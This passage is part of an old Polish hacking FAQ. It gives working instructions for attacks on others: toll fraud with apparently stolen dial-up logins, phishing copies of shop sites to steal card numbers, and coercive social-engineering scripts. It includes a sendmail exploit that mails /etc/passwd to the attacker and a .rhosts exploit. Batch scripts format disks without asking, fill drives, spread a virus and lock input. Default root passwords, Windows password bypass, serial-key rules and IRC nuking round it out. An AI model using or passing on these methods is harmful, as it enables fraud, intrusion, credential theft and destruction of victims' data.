  f1=Count&f2=Mode&f3=Size&f4=Date&f5=Host&f6=Path&header=none&sort=date&trlen
  =20
<------Bardzo dlugie polecenie------>

Polecenie to kae wyszukiwarce Altavista znale (w caym internecie) pliki WS_FTP.INI
Gdy znajdziemy taki plik i rozkodujemy hasa, chyba nie musze mwi co mamy dalej robi... ;)
P.S Jak znajdziecie takie pliczki (co obecnie jest bardzo trudne) to przylijcie je do mnie (adres na pocztku FAQ)
    Zostan one opublikowane w nastpnych wersjach FAQ !!!
*********************************************************************
16)

Oszustwa telefoniczne:

DOSTP DO INTERNETU GRATIS:

Kady wie, jakie rachunki dostarcza nam TP S.(R).A, istnieje kilka numerw dostpowych, za ktre NIC nie
pacimy, numery te s w 100 % legalne, ale istnieje jeden problem... nieznane mi s nazwy uytkownikw i hasa do nich.
Ale zamanie uytkownika i hasa pozostawiam wam (miej zabawy...)

Oto spis DARMOWYCH numerw dostpowych:
<----DARMOCHA---->
   0 800 06885
   0 800 202122
   0 800 20127
   0 800 20019
   0 800 20023
   0 800 20866
   0 800 20043
   0 800 20034
   0 800 20842
   0 800 61028
   0 800 63015
<----DARMOCHA---->

A teraz kilka numerkw z innego FAQ:

0-8001-20-200
0-8001-20-067
0-8001-20-062
0-8001-20-055
0-8001-20-035
0-8001-20-023
0-8001-20-107
0-8001-20-121
0-8001-20-127
0-8001-20-153
0-8001-20-159
0-8001-20-178
0-8001-20-203
0-8001-20-206
0-8001-20-209
0-8001-20-210
0-8001-20-212
0-8001-20-215
0-8001-20-216
0-8001-20-217
0-8001-20-229
0-8001-20-241
0-8001-20 212
0-8001-20 127
0-8001-20 019
0-8001-20 023
0-8001-20 200
0-8001-20 015
0-8001-20 055
0-8001-20 210
0-8001-20 215
0-8001-20 815
0-8001-20 153
0-8001-30 055

<----UDAO MI SI NAMIERZY KILKA LOGW I HASE---->
 -0-80020043 login:adam2  psswd:b34fr0
 -0-80020041 login:unknown psswd:unknown
 -0-80020034 login:koliber psswd:koliber
 -0-80020019 login:unknown psswd:unknown
 -0-80020866 login:ppp     Psswd:ppp
<----UDAO MI SI NAMIERZY KILKA LOGW I HASE---->

Na niektrych modemach i telefonach nie wiem dlaczego, nie chce wybiera niektrych numerw.
Jeli tak si dzieje, to przed numerem telefonu dodajce jeszcze numerek "48"
---------------------------------------------------------------------
BEZPATNY 0700...

a) Ten numer dziaa tylko przez budke telefoniczn: (2% szans, e zadziaa)
   1.Podnosimy suchawke...
   2.Wykrcamy numer 6230015 lub 987-987
   3.Dostajemy sygna, e zostalimy rozczeni...
   4.Wykrcamy dowolny numer 0700, lub dzwonimy sobie do babci w Uzbekistanie... (za darmoche...)
b) Ten numer dziaa tylko na etoniaki... (15% szanas, e zadziaa)
   1.wrzucamy zeton
   2.wystukujemu 0 - nie  z  klawiatury  ale  bardzo  szybko
      pukamy w widelki 10 razy. Zeby sie latwiej  liczylo  ja
      uzywam metody ze licze trojkami ( trzy trojki  i  potem
      jeszcze raz - 1231231231 )
   3.wstukujemy reszte numeru juz bez zera np. 700xxxxx

*********************************************************************
17)

Podszywanie si pod WWW:

Metoda ta jest dziecinnie prosta, jednak uywana przez hackerw (np. do wykradania numerw kart kredytowych) 
nieprzerwanie od wielu lat. Sposb ten polega na zrobieniu IDEALNEJ kopji jakiej strony, a nastpnie odpowiednie
spreparowanie adresu.

Oto jak to mona zrobi:
1.Otwieramy strone WWW jakiego sklepu internetowego
2.Zapisujemy strone gwn, kilka podstron, formularze i wszystkie obrazki na dysku.
3.Tak zapisan strone publikujemy w sieci (najlepiej na jakim darmowym koncie)
4.Na naszej stronie domowej wstawiamy odsyacz do "SKLEPU", ktry w rzeczywistoci bdzie nasz podrbk
5.Gdy lamer kliknie na odsyacz, zostanie przeniesiony na nasz "sztuczn stron", gdy chce co zamwi,
  to podaje swoje dane + numer karty, nastpnie klika na WYLIJ i... te informacje wdruj na nasz email,
  a nie do jakiego tam sklepu ;)
6.Gdy ju mamy numerek karty, moemy kupowa co chcemy, polecam: samochody, komputery, RTV, AGD itp...

RADA:
Jeli chcemy zrobi naprawde wiarygodn kopie strony, to powinnimy jej nada jak podobn do oryginalnej
domene. Najlepszym polskim serwerem oferujcym darmowe domeny jest PRV (WWW.PRV.PL) & ALIAS.POLBOX (WWW.ALIAS.POLBOX.PL)

Oto przykad:
Gdy podrabiamy witryne EMPIK'u to stronie dajemy domene: (dla PRV) WWW.EMPIK.PRV.PL, lub (dla Polbox'u) WWW.EMPIK.Z.PL
P.S aden lamer nie zwrci uwagi na to PRV czy Z przed .PL

*********************************************************************
18)
Social engeneering, czyli to co lubie najbardziej:

Social engeneering, to po prostu umiejtna rozmowa na chacie, irc, icq, gadu-gadu, odigo itp.
Polega ona na umiejtnym zdobywaniu inforamcji. Podam teraz przykady le i dobrze przeprowadzonej rozmowy na chacie...
P.S LAMER, to osoba ktra chce mie haso do jego konta, ofiara to... ofiara lamera, czyli np. administrator serwera:

LAMER:  Wczoraj jakis hacker usunol mi wszystkie listy z mojego konta...
OFIARA: I co ja mam z tym wsplnego ?
LAMER:  Jeli chcesz, to moge sprawdzi czy twoje konto jest dobrze zabezpieczone, potrzebuje tylko login + haslo...
OFIARA: Spadaj lamerze... >:|

Tak zakoczy si kada tego typu rozmowa, nawet z najgorszym adminem-lamerem.
Przykadem dobrej rozmowy jest:

SERVIS: Dostaem wiadomo, e wasz serwer WWW.DEBILE.COM jest przeciony.
ADMIN:  Tak, to prawda, a skt to wiesz ?
SERVIS: Jestem z serwisu, twj szef kaza si mi z tob skontaktowa. Mam wzi od ciebie login + haso
ADMIN:  Przykro mi, ale nie moge podawa takich danych :)
SERVIS: Suchaj, naprawde nie mam czasu, a serwer musze naprawi ju dzisiaj. Jak ci co nie odpowiada, 
        to pogadaj z szefem...
ADMIN:  Dobra, mj login to: DEBILEK, a haso brzmi: 12345

Jak wida w drugim przypadku, zastosowano specjaln metod rozmowy:

- Hacker w tym przypadku wybra sobie wiarygodny pseudonim (SERVIS)
- Hacker zacz rozmowe jak fachowiec, przechodzc od razu do rzeczy.
- W przypadku odmowy podania hasa posy si "Social engeneering" i zmusi psychicznie ofiare
  do podania loginu i hasa

Jak wida z powyrzszego opisu, w takiej rozmowie nie naley liczy na lito, wspczucie i zrozumienie.
Naley sie posy tzw. "systemem kar", lub "systemem autorytarnym", czyli musimy wymyli jak moe by
kara za niewykonanie danego polecenia np: "Jeli nie sprawdze konfiguracji twojego konta, to moe ci si zepsu PC !!!"
Mona te posuy si tzw. autorytetem, czyli osob ktra jest znana ofierze np:

- szef mi kaza...
- dyrektor firmy...
- administrator twojej sieci...
- Uytkownicy zgaszaj usterke... (ten numer adko skutkuje)

Nie wiem, czy wiecie, ale Social Enigering to sposb pozyskiwania hase uywany przez
najlepszego hackera wszechczasw: Kevina Mitnicka !!!

Polecam ten sposb, jeli nauczycie si dobrze prowadzi rozmowe i "zapiecie" w sieci jak grub rybe, to
ten numer zadziaa na jakie 80%.

<----ONLY_LIFE---->
PRZYKAD Z MOJEGO YCIA:

MIEJSCE AKCJI: rzecz dzieje si w szkole w sali komputerowej. Przygotowyje si do oglnopolskiego konkursu informatycznego.
CZAS AKCJI: Lekcje (z ktrych w ramach konkursu zostaem zwolniony)
BOHATEROWIE: JA (czyli ja !!!), XXX (osoba ktr oszukaem, jej nazwiska niestety nie podam)

JA:  Moe jednak skoczymy przeglda te strony o pascalu i o... (no wiecie co mg on przeglda)
XXX: Po co, pani i tak nie ma... :)
JA:  Suchaj, bo powiem nauczycielce co robisz i zgosze e si nie przygotowujesz (to bardzo brutalny 
     Social engeneering - przynajmniej dla ucznia...)
XXX: No dobra, co mam zrobi ?
JA:  Wyle ci e-maila na adres XXX@XXX.XXX, w mailu bdzie zacznik, ty masz go odebra i uruchomi, nastpnie
     powiedzie mi co to jest (wysaem mu NETBUSA)
XXX: No dobra...

Gdy XXX odebra wiadomo i uruchomi PATCH.EXE (nazwy i ikonki nie zmieniaem, bo wiedziaem e na 100% nie wie co to jest NETBUS i da si nabra na takie co...)
Ja zaczem si bawi: najpierw powyskakiwao mu kilka okienek z bdem, potem myszka zacza "wariowa", a potem 
si wylogowa, na koniec zamknem mu systemik, a on z dziwn min wsta i nacisn mi RESET na moim PC (to mnie zagio)
To jest przykad nieumiejtnego wykorzystania NETBUSA, ale takie sztuczki s mieszne TYLKO wtedy, jeli widzisz twarz
ofairy... (a mwie, e BYO na co popatrze)
<----ONLY_LIFE---->

METODY SOCIALE ENGENERINGU:

Oto sprawdzone przez hackerw metody przygotowania sie do "gadek":

-Jesli to firma najlepiej zorientowac sie z jakiej sa branzy i podac sie za
kontracheta w interesach lub czlowieka z serwisu.

-Jesli chodzi o cc to najlepiej wiedziec w jakim bank, imie i nazwisko
ofiary no i telefon.

-Jesli robisz to juz przez telefon to pamietaj by robic to z budki,
 najlepiej takiej ktora ma wlasny numer by w razie gdy ofiara zacznie cos
 podejrzewac podasz nr budki i kazesz szybko oddzwonic.

-Jesli podszywasz sie pod jakis zaklad pracy lub bank najlepiej dzwon,
 kilkanascie minut przed jego zamknieciem i nawijaj ze strasznie ci sie
 spieszy, piatek 5:45 to wprost pora na takie numery.

-Jak sie zmieszasz i spieprzysz sprawe bo slabo przygotujesz gadke to nie
 wal sluchawka tylko delikatnie sie wycofaj, bo jak pozniej sprobujesz
 jeszcze raz z ta sama osoba to bedzie juz ona 10x bardziej podejrzliwa.

GADANIE Z LAMEREM: (z innego FAQ)

<----LAMER---->
Jednym ze sopsobow zdobywania hasel moga byc gadki z lamerami, nie wymaga to
wiele czasu, a jest jednym z najprostszych sposobow zdobywania hasel.
Idz na irc na kanal o hackingu:
#hacking #unixhacking #hack #hackers #hacker 
#hackpl #hack_pl #plhack i takie tam
Musisz poszukac kogos poczatkujacego, kogos ktonie wie tyle co ty!
Jak znajdziesz ofiare tozapytaj go o cos czego nie wie, gosc siedzu cicho, albo
da ci kopa z kanalu. No i masz twojego lamera/
/msg do niego tak, aby inni nie widzieli ze z nim gadasz. Pogadaj z nim , powiedz 
ze mozesz mu pomoc i w koncu zaproponuj ze zdobedziesz roota na kazdym systemie i 
mozesz sie z nim tym podzielic jak chce, niech tylko da konto a ty mu pokazesz.
Jesli juz zdobedziesz root'a i nie chcesz sie z nim dzielic daj mu cos co zaspokoi
jego i powiedz ze ci sie nie udalo a w tym czasie zesniffuj cala siec:)
<----LAMER---->

Kilka rad:

1 Jesli to firma najlepiej zorientowac sie z jakiej sa branzy i podac sie za
  kontracheta w interesach lub czlowieka z serwisu.
2 Jesli chodzi o cc to najlepiej wiedziec w jakim bank, imie i nazwisko
  ofiary no i telefon.
3 Jesli robisz to juz przez telefon to pamietaj by robic to z budki,
  najlepiej takiej ktora ma wlasny numer by w razie gdy ofiara zacznie cos
  podejrzewac podasz nr budki i kazesz szybko oddzwonic.
4 Jesli podszywasz sie pod jakis zaklad pracy lub bank najlepiej dzwon,
  kilkanascie minut przed jego zamknieciem i nawijaj ze strasznie ci sie
  spieszy, piatek 5:45 to wprost pora na takie numery.
5 Jak sie zmieszasz i spieprzysz sprawe bo slabo przygotujesz gadke to nie
  wal sluchawka tylko delikatnie sie wycofaj, bo jak pozniej sprobujesz
  jeszcze raz z ta sama osoba to bedzie juz ona 10x bardziej podejrzliwa.

Rady do IRC:
1.Cierpliwie rozmawiaj z ofiar.
2.Musisz by miy
3.Jeli udajesz zwykego uytkownika, a nie jak wan osob, to staraj si wmawia ofierze, e
  macie takie same zainteresowania itp.
4.Nie moesz by zbyt nachalny, jeli rozmowa ci nie wychodzi, to zmie temat, ale nigdy nie uciekaj !!!
5.Nie uywaj przekupstwa, lecz szantau...
6.Udawaj, e jeste na takim samym poziomie wiedzy komputerowej jak osoba z ktr rozmawiasz (to bardzo pomaga)
7.Gdy zdobdziesz ju to co chciae, to nie zrywaj kontaktu z osob, musisz si z nim poegna, zapyta o email itp.
  Od czasu do czasu napisz co do takiej osoby na jego email, wylij mu jakie pliczki (trojana) itp.
  Uwierz mi, jak udao si za pierwszym razem, to taka osoba moe sta si dla ciebie bezdennym rdem
  informacji (czyt. hase).

*********************************************************************
19)
Hackowanie Sendmaila:

Hackowanie starszego sendmaila niz 5.55 (sprawdzone na SunOs 4.1)

- Telnetuj sie na port 25 atakowanego serwera: "telnet mail.jakis.tam.adres.pl 25"
- Pojawi ci sie powitanie serwera pocztowego, powinno byc tam jakies 5.x lub
  4.x, nowsze wersje lub systemy "nie wygladajace" na zwykle sendmaile
  mozesz sobie darowac.
- Napisz:
    helo hacker
    mail from: "|/bin/mail twoj@email.pl </etc/passwd"
    rcpt to: nikt@gdziestam.com
    data
    .
    quit
- Teraz pozostaje tylko czekac, az przyjdzie do ciebie list zawierajacy
  w srodku hasla do serwera, ktore musisz pozniej zcrackowac.

-----------------------------------------------------------------------
SENDMAIL 5.64:

Blad w programie uudecode, ktory ma dostep do .rhosts na koncie ofiary -
mozemy za jego pomoca zmienic zawartosc tego pliku! Na poczatek trzeba
zakodowac programem uuencode - dla leni podaje wyglad zakodowanego juz pliku:

<-- cut here -->
$*R`K"@``
`
end
<-- cut here -->

Teraz telnetujemy sie na serwer: "telnet ofiara.com 25". Tak wyglada
sesja:

220 enterprise Sendmail 5.64/zippy-1.22.01 ready at Mon, 25 Jun 97 09:34:12 -0400 (GMT)
helo hacker
250 enterprise Hello hacker (ppp2-cst15.warszawa.tpnet.pl), pleased to meet you
mail from: bin
250 bin... Sender ok
rcpt to: decode
250 decode... Recipient ok
data
354 Enter mail, end with "." on a line by itself
begin 644 /XXXX/.rhosts
$*R`K"@``
`
end
.
250 Ok
quit
221 enterprise closing connection

Program uudecode dostanie do rozkodowania plik .rhosts zawierajacy
zakodowany tekst '+ +', rozpakuje go... i mozemy bez hasla zalogowac sie
na dowolne konto!!! PS. W miejsce XXXX wpiszcie nazwe konta hackowanego
uzytkownika (/home/lamer), albo na chama - konto roota (/root)...
*********************************************************************
20)
Zlosliwe programy w Ms-Dos:

Wszystkie zaprezentowane programy wystarczy wpisa w notatniku i zapisa do
jakiego pliku z rozszeeniem BAT...
---------------------------------------------------------------------
Wqrwiacz lamerw:

<---BAT--->
:go
md fuck
cd fuck
goto go
<---BAT--->

P.S Uruchamia TYLKO z dysku twardego - najlepiej umiesci na pulpicie...
---------------------------------------------------------------------
Proste formatowanie dysku bez pytania:

<---BAT--->
@echo off
echo t | format c: /q /autotest /v:wirus >nul
<---BAT--->
---------------------------------------------------------------------
RESET KOMPUTERA DOS:

<---BAT--->
echo g=ffff:0 | debug
<---BAT--->
---------------------------------------------------------------------
RESET KOMPUTERA WINDOWS:

<---BAT--->
RUNDLL32 USER,EXITWINDOWS
<---BAT--->
---------------------------------------------------------------------
ZAPENIANIE DYSKU TWARDEGO:

<---BAT--->
@echo off
cls
REM Linijka nizej to tylko zmylka dla Lamera
echo Trwa ladowanie programu
:go
echo ha-ha-ha >>hahaha.txt
REM Ta linijka powoduje zwiekszenie rozmiaru pliku x2
type hahaha.txt >>hahaha.txt
goto go
<---BAT--->

P.S Na moim PC (566 MHz) w cigu 5 sekund utworzyo pliczek ponad 36 MB !!!
---------------------------------------------------------------------

WIRUS PLIKOW BAT (zaczerpnity z U-FAQ2):

<---BAT--->
REM !!!Jezeli zostal podany parametr %1 INFEKCJA to parametr %2 jest prawdo-
REM !!!podobnie nazwa pliku i wirus przechodzi do infekcji
IF "%1"=="INFEKUJ" GOTO INFECT_QUX
REM !!!a jak nie to szukamy ofiar! ale najpierw trzeba okraslic nazwe uru-
REM !!!chamianego programu wsadowego.
SET QUX=%0
if not EXIST %QUX% SET QUX=%0.BAT
if "%QUX%" == "" SET QUX=AUTOEXEC.BAT
REM !!!Nazwa ustalona. Dalej usuwamy ew. smiecie z poprz. infekcji
IF EXIST %TEMP%\~QUXCODE.BAT DEL %TEMP%\~QUXCODE.BAT
REM !!!Ustalamy nazwe kodu wiruska :))
SET EXEC=%TEMP%\~QUXCODE.BAT
REM !!!Przepisujemy wiruska do pliku tymczsowego...
TYPE %QUX%|FIND "QUX" >> %TEMP%\~QUXCODE.BAT
REM !!!Zrobione!!! Przystepujemy wywolania procedury infekujacej pliki ;)
For %%b IN (*.BAT) DO CALL %QUXEXEC% INFEKUJ %%b
REM !!!Tu sie wlasciwie wirus konczy. Txt za etykieta : I N F E C T _ Q U X to
REM !!!procedura infekujaca pliki BAT ;>
goto END_QUX
:INFECT_QUX
Shift QUX
REM !!!Sprawdzanie czy plik jest zainfekowany
FIND "QUX" %1 >nul 
REM !!!jezeli tak - to koniec procedury
IF NOT ERRORLEVEL 1 GOTO DEAD_QUX
REM !!!Ty tez usuwamy ew. smiecie z poprz. infekcji
IF EXIST ~BATQUX.TMP DEL ~BATQUX.TMP
REM !!!Zmieniamy nazwe pliku infekowanego na ~ B A T Q U X . T M P 
REN %1 ~BATQUX.TMP
REM !!!Dopisujemy na koncu(ale przed kodem wiruska) @echo off(wiadomo po co)
echo @echo off >> ~BATQUX.TMP
REM !!!...i przepisujemy reszte wiruska :)))
TYPE %TEMP%\~QUXCODE.BAT >> ~BATQUX.TMP
REM !!! Teraz wystarczy juz tylko zmienic nazwe na nazwe ofiary i...
REN ~BATQUX.TMP %1
REM !!!...PLIK ZAINFEKOWANY!
:END_QUX
REM !!!Zerowanie zmiennych.
SET QUXEXEC=
SET QUX=
:DEAD_QUX
REM !!! THE KONIEC !!!
<---BAT--->
---------------------------------------------------------------------
JAK LATWO PODRZUCI KOMU ZOLIWY PLIK REJESTRU:

<---BAT--->
REGEDIT /S PLIK.REG
<---BAT--->

P.S Przecznik /S spowoduje, e plik rejestru zostanie poczony z naszym bez pytania...
---------------------------------------------------------------------
ARTOBLIWY WIRUS MOJEJ PRODUKCJI (nie psuje niczego):

<---BAT--->
@echo off
goto go
:infect
echo [autorun] >c:\autorun.inf
echo open=c:\a.bat >>c:\autorun.inf
echo icon=c:\windows\system\pifmgr.dll,7 >>c:\autorun.inf
echo @echo off >c:\a.bat
cls >>c:\a.bat
echo echo. >>c:\a.bat
echo echo Masz wirusa... >>c:\a.bat
echo. >>c:\a.bat
echo Pause >>c:\a.bat
echo Zainfekowano !!! >c:\wirus.inf
goto end
:go
if not exist c:\wirus.inf goto infect
:end
<---BAT--->
---------------------------------------------------------------------
FAJNY WIRUS (oczywicie made in ja_sam):

<---BAT--->
@echo off
goto go
:infect
subst e: c:\windows
echo [autorun] >c:\windows\autorun.inf
echo open= >>c:\windows\autorun.inf
echo icon=c:\windows\system\pifmgr.dll,5 >>c:\windows\autorun.inf
echo @echo off >c:\a.bat
echo Zainfekowano !!! >c:\wirus2.inf
goto end
:go
if not exist c:\wirus2.inf goto infect
:end
<---BAT--->

P.S Wirus ten oparty jest na kodzie poprzedniego insekta...
P.S Jeli chcecie wiedzie co robi wirus, to kliknijcie 2 razy na Mj Komputer (efekt ten zniknie po resecie)
---------------------------------------------------------------------
WIRUS GUCHO-NIEMY 1.0 (copyright by JA !!!)

<---BAT--->
@echo off
rundll32 mouse,disable
rundll32 keyboard
<---BAT--->

Jak si atwo domyle, wirus ten blokuje klawiature i myszk, tak, e poza CTRL+ALT+DEL nie dziaa NIC !!!
---------------------------------------------------------------------
WIRUS PIJANA MYSZKA 1.0 (autor to JA !!!)
<---BAT--->
@echo off
:go
rundll32 user,setcursorpos
goto go
<---BAT--->

Sprubuj uruchomic cos takiego w Windows, a nastepnie poruszaj myszk... ;)
*********************************************************************
21)
Jak shackowac strone WWW:

Istniej cztery metody lamania has do strony:

- Metoda Sownikowa (szybka, ale wymaga naprawde duego sownika)
- Metoda "Brute Force" (najwolniejsza, ale masz 99% e zamiesz haso)
- Metoda zgadywania (to nie jest metoda hackerska, lecz ChAkErSkA)
- Metoda z wykoystaniem inynierii socjalnej (jest opisana wczeniej)

W tym rozdziale zajme si opisem tylko dwuch pierwszych metod.
Metoda sownikowa polega na tym, e musimy przygotowa sobie dobry (czyt. duy) sownik ze
sowami, jakich mg uy autor strony. Sownik taki (aby by uyteczny) powinien mie minimum
10 MB (czystego TXT). W skad takiego sownika powinny wchodzi:
- Wszystkie kombinacje imion
- Nazwy programw, gier, filmw itp.
- Kolejnych sekwencji klawiszy (np. 123; qwerty; asdfg; zxcvb itp.)

Metoda "Brute Force" polega na sprawdzaniu WSZYSTKICH moliwych kombinacji znakw.
Metody tej NIE naley przeprowadza rcznie, lecz przy uyciu specjalnego programu.
Naley si jednak liczy z tym, e rozkodowanie strony w ten sposb (w zalenoci od szybkoci komputera, oraz
dugoci i zoonoci hasa) moe zaj od kilkunastu minut do kilku godzin.
Programy ktre znacznie uatwi Ci prac podczas hackowania strony to np:

WebCracker - Oferuje metode sownikow, ale jest naprawde szybki
WWWHack    - Oferuje wszystkie metody (jest super, uywam go), niestety aby mg dziaa, musisz
             mie Netscape Comunicator lub Sylaba Komunikator

---------------------------------------------------------------------------------
Oto jak shackowac przykadow strone przy uyciu programu WWWHack:

1.Uruchamiamy Netscape/Sylabe
2.Wchodzimy na strone-ofare
3.Uruchamiamy WWWHack
4.Wybieramy z Menu: Advenced Methods>Advenced Hack
5.W polu "ENTER URL:" powinien pojawi si adres hackowanej strony WWW
  (jeli go tam nie ma, to wpiszmy go rcznie)
6.W obu grupach (Username i Password) mamy do wybory trzy metody ataku:
  - Atak przy uyciu sownika
  - Atak Brute Force (polecam)
  - Atak przy uyciu staej nazwy (wtedy gdy znamy haso lub login)
7.W naszym przypadku wiemy, e login=LAMER, a haso jest nieznane
8.W tym celu ustawiamy w pierwszej grupie zaznaczamy ostatni opcj, a jako
  login podajemy LAMER
9.W grupie PASSWORD, ustawiamy drug opcje, podajc warto min=3, a max=8
  (to standardowe dugoci hasa)
10.Po ustawieniu wszystkich opcji klikamy na <OK> i robimy wan strategiczne
   czynno, bez niej caa sztuczka moe si nie uda:
   Musimy mie cierpliwo i... i do kibelka ;)
   Po dugim posiedzeniu (ok. 2-3 godz.) podchodzimy do komputera i patrzymy
   czy nam si udao, jeli nie powtarzamy poprzedni czynno, czyli:
   idziemy do kibelka na duszy okres !!!
*********************************************************************
22)

Hackowanie plikw PWL:

Hasa dostpu do Windowsa przechowywane s w jego katalogu gwnym. 
Rozszerzeniem takiego pliku z hasem jest .pwl, a nazwa pliku jest nazw uytkownika. 
Istnieje bardzo duo programw do rozkodowywania plikw pwl. Oprcz tego isteniej take programy, 
ktre wycigaj hasa uyte przez uytkownika do wejcia np. na jaki dysk sieciowy. 
Przykadem takiego programu moe by Cain. wietny programik polecam.

Hasa w plikach PWL mona ama, jak i... je usun oto jak to zrobi:

1.Siadamy przed komputerem ofiary
2.Otwieramy katalog gwny Windows'a
3.Szukamy pliku PWL ofary (np. "LAMER.PWL")
4.Robimy jego kopje na dyskietce
5.Wchodzimy do pliku PWL (tego na dysku) przy uyciu notatnika
6.Kasujemy wszystko co w nim jest (nie zostawmy niczego!)
7.Zapisujemy zmiany w pliku
8.Logujemy si jako uytkownik, ktrego hasa zamalimy
9.Robimy na komputerze co chcemy... ;)
10.Przywracamy wszystko do normy, przenoszc kopje pliku PWL z dyskietki do katalogu Windows'a
*********************************************************************
23)

Unix & Linux:

---------------------------------------------------------------------------------
Oto spis najpotrzebniejszych polece Unixa, wraz z ich opisem:

cd 	  - zmienia aktualny katalog
ls,dir  - wyswietla zawartosc katalogu
cp	  - kopiuje plik
rm	  - kasuje plik
mkdir	  - zaklada katalog
rmdir	  - usuwa katalog
du	  - wyswietla ilosc zajetego miejsca
pwd	  - wyswietla aktualny katalog
mv	  - przenosi plik
ln	  - wiaze pliki
cat 	  - wyswietla zawartosc pliku
adduser - dodaje uzytkownika
userdel - kasuje uzytkownika
finger  - wyswietla dane uzytkownika
chfn	  - zmienia dane o uzytkowniku
chsh    - zmienia shell (w passwd)
chown	  - zmienia wlasciciela pliku lub katalogu
chmod	  - zmienia atrybuty pliku lub katalogu
	    atrybuty:
	    x - uruchamianie
	    r - odczyt
	    w - zapis
	    s - program oruchamia sie z takim uid-em jaki mial user
	        ktory nadal ten atrybut
passwd  - zmienia haslo
chage	  - zmienia date ostatniej zmainy hasla, waznosci konta
mc	  - odpala imitacje Nortona
startx  - uruchamia winde
pico	  - edytor tekstu
pine	  - program pocztowy
telnet  - uruchamia telnet
irc	  - klient irc-a
su	  - zmienia uzytkownika
logout  - wylogowuje
---------------------------------------------------------------------------------

UNIWERSALNE LOGINY I HASA DO ROOT'A:

P.S Konto ROOT w UNIX & LINUX to jedyne konto w systemie ktre posiada WSZYSTKIE moliwe udogodnienia i
    mona za jego pomoc dokonywa rzeczy, ktre normalnie byyby niemoliwe :)

A oto wspomniany wczeniej spis uniwersalnych hase (dziaa tylko na BARDZO lamerskich serwerach)
UWAGA: Hasa i loginy zapisane s tu w formacie "LOGIN: HASO"

sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon

*********************************************************************
24)
Numery seryjne Micro$oftu:

Micro$oft wymyslil sobie dziwny sposob zabezpieczania swoich produktow przez hasa.
Jeli kto z was nie wie jak kodowane s hasa w Windows, to znaczy, e jest kompletnym 
lamerem, lub dosta komputer kilka godzin temu... ;)
Oto kilka wersji haseek:

XXXX-XXXXXXXX - uniwersalny kod to 1234-12345467
XXX-XXXXXXX - trzy pierwsze cyfry mog by dowolne, a suma pozostaych
              musi by podzielna przez 7 i wieksza od 7 np: 000-4031337
XXXXX-OEM-XXXXXXX-XXXXX - trzy pierwsze cyfry s dowolne, dwie nastpne to rok 
                          produkcji (95, 96, 97, 98 itp.)suma kolejnych siedmiu 
                          musi by podzielna przez 7 i wieksza od 7, pozostae
                          5 cyferek jest dowolnych. Np: 83696-OEM-4031337-89364
                          
*********************************************************************
25)
IRC War:

Co to jest IRC, to hcyba kady hacker wie... (?)
A jak nie wiesz, to poczytaj sobie jakie FAQ/tutorail/manual na temat IRC itp.
Kady z nas przynajmniej raz w yciu zosta wykopany z IRC, lub uyto na nim NUKA...
Czas to zmieni !!!
Od dzi nie bdziemy ju ofiarami, lecz napastnikami. W tym wanie ma nam pomc ten rozdzia...

---------------------------------------------------------------------------------
Glupie zarty:
Oto spis kilku glopich zartow do wykonania na IRC:

- Zmien sobie nicka np. na COM1 lub LPT i pogadaj z kims - zobaczysz, ze bedzie zly, ze mu myszka
  lub drukarka cos szaleje...
- Zapros kogos na kanal #5,0 - wyrzuci to takiego frajera ze wszystkich kanalow IRC...

---------------------------------------------------------------------------------
Zdejmowanie restrykcji:

Co to jest restrykcja, tego nie musze tlumaczyc...
Oto jak sie jej pozbyc:
Wpisz na IRC: /mode <twoj nick> -r+iw
Ta metoda nie dziala na 98% serwerow, ale warto sprobowac, jesli nie zadziala, to 
pozostaje nam poszukac serwera IRC'owego nie nakladajacego restrykcji (niestety
wszystkie polskie serwery daja +r)
---------------------------------------------------------------------------------

BOT:

Na kanaach IRC, strem prawa i moralnoci jest BOT...
Bot to may programik/skrypt, majcy za zadanie udawanie czowieka.
Ale bot posiada bardzo rozbudowane opcje np:
 - Kopniak z kanau za przeklestwa i Flood'a
 - Autoop za jakie tam duperele...
 - Deop za naduywanie OP'a
 - kilka innych ciekawych i niezwykle wqrzajcych funkcji.
Kayd hacker, musi umie poradzi sobie z takim natrtem. Ja znam kilka sposobw, oto one:
 [1] - Najprostrza  metoda  to  spowodowanie
       "execes flood"-a, nastepuje to jak ktos za duzo  wysyla
       na kanal, wtedy serwer wyrzuca go za flood-a. Najlepiej
       jak bot odpowiada jakims glupim  komunikatem  na  rozne
       rzeczy takie jak ping czy msg. Wchodzisz wtedy  kilkoma
       uzytkownikami na IRC i kazdy np. pinguje bota 50  razy,
       gdy bot wykryje pingowanie czasami  puszcza  na  public
       komunikat w stylu "HACKER proboje mnie floodowac!", a
       jak odpowie tak 100 razy w ciagu sekundy :)) to  bedzie
       mial wylot z serwera za flood-a !!!
 [2] - CTCP (nie mylic z CCCP :-]) jest to zbior polecen  ktore
       wysylacja do komputera docelowego  pytanie,  a  komputer
       docelowy wysyla  odpowiedz.  Na  przyklad  komenda  PING
       wysyla do koputera docelowego pytanie w  stylu - ZYJESZ?
       a komputer docelowy odpowiada - ZYJE, wtedy jest jeszcze
       zapisany czas odpowiedzi. Mniej wiecej 3-4  uzytkownikow
       wysyla do ofiary pakiety po okolo 50 pytan (tak zeby nie
       wyleciec za flooda) - PING , VERSION  albo  inne.  Wtedy
       ofiara odpowiada na te wszystkie  pytania  i  w  ktorym
       momecie serwer wysyla swoje PING i nie otrzymujac  znaku
       zycia od niego wyrzuca go z serwera jako tego ktory  sie
       juz rozlaczyl.
---------------------------------------------------------------------------------
BAN, czyli jak omin zakaz wstpu na kana:

Istniej dwa rodzaje BAN'w: na nick'a i na IP. (istnieje jeszcze ban na server, ale omija go sie tak samo jak IP)
BAN'a na nick umie omin chyba kady. Wystarczy wej na IRC pod innym nickiem !!!
BAN na IP jest trudniejszy do ominicia dla lamerw, ale kady hacker wie, e wystarczy uy serwera Proxy, 
lub jak dzwonisz przez 0202122 to wystarczy si rozczy i poczy ponownie !!!

P.S Bedzie zle, jak zaloza wam wszystkie mozliwe typy banow ;)
    Na IP, na serverek, na nicka (i wszystkie odmiany nicka) itp...
---------------------------------------------------------------------------------
NUKE, czyli jak kopn w d*** uytkownikw M$ shit 95:

Do tego celu mona uy jednej z edycji popularnego programu Win_Nuke.
Aby go uy, musimy zna tylko numer IP komputera ofiary.
Ja osobicie uywam "WINUKE 2.0 for DOS". Ta wersja Win Nuka pracuje w trybie
Ms-Dos, ale oferuje on wietne opcje, i dziaa BARDZO szybko.
Nukuje on nie tylko port 139, ale wszystkie porty, jakie tylko mog zawiesi Shit 95 !!!
